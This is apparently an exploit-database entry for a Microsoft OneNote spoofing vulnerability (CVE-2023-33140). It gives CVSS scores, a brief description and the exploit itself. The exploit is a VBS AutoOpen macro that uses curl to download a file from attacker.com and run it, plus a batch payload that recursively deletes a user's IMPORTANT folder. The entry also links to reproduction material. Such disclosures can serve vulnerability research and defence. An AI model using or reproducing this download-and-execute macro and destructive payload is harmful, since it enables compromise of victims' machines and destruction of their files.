Microsoft OneNote (Version 2305 Build 16.0.16501.20074) 64-bit - Spoofing Vulnerability

2023-06-2600:00:00

nu11secur1ty

0day.today

163

microsoft onenote

spoofing vulnerability

malicious url

file execution

6.5 Medium

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

REQUIRED

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

NONE

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N

0.001 Low

EPSS

Percentile

43.1%

JSON

## Title: Microsoft OneNote (Version 2305 Build 16.0.16501.20074) 64-bit - Spoofing
## Author: nu11secur1ty
## Vendor: https://www.microsoft.com/
## Software: https://www.microsoft.com/en/microsoft-365/onenote/digital-note-taking-app
## Reference: https://portswigger.net/kb/issues/00400c00_input-returned-in-response-reflected

## Description:
Microsoft OneNote is vulnerable to spoofing attacks. The malicious
user can trick the victim into clicking on a very maliciously crafted
URL or download some other malicious file and execute it. When this
happens the game will be over for the victim and his computer will be
compromised.
Exploiting the vulnerability requires that a user open a specially
crafted file with an affected version of Microsoft OneNote and then
click on a specially crafted URL to be compromised by the attacker.

STATUS: HIGH Vulnerability

[+]Exploit:
```vbs
Sub AutoOpen()
  Call Shell("cmd.exe /S /c" & "curl -s
https://attacker.com/kurec.badass > kurec.badass && .\kurec.badass",
vbNormalFocus)
End Sub

```
[+]Inside-exploit
```
@echo off
del /s /q C:%HOMEPATH%\IMPORTANT\*
```

## Reproduce:
[href](https://github.com/nu11secur1ty/CVE-mitre/tree/main/2023/CVE-2023-33140)

## Proof and Exploit:
[href](https://www.nu11secur1ty.com/2023/06/cve-2023-33140.html)

## Time spend:
01:15:00


--